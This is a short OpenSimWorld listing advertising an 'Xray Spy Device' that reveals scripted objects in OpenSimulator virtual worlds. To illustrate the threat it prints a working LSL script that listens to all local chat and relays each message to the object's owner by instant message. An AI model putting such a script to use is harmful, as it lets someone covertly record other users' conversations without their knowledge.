OpenSimWorld is the directory of 3D Virtual Worlds based on OpenSimulator and connected through the HyperGrid. Learn More

Sometimes people spy on you.
They use a simple script like this one and put it in any object.
key gkyOwner;

default
{
state_entry()
{
gkyOwner = llGetOwner();
listenHandle = llListen(0, "", "", "");
}

listen(integer channel, string name, key id, string message)
{
llInstantMessage(gkyOwner,name + ": " +message);
}
}
This script then reports back to them everything you say in local chat - EVEN ON ANOTHER GRID. How can you find these hidden bugs? They could be inside that vase of roses, or even in your wedding band ! Well now you can. The Xray Spy Device will let you see scripted items all around you. It's up to you to God mode them, and read the script inside to see if it's a spy script. Ask yourself a simple question. Does that rock my friend gave me really need a script?
Come get your Xray Spy Device today at cyberdatastorm.com:8002/Wizardry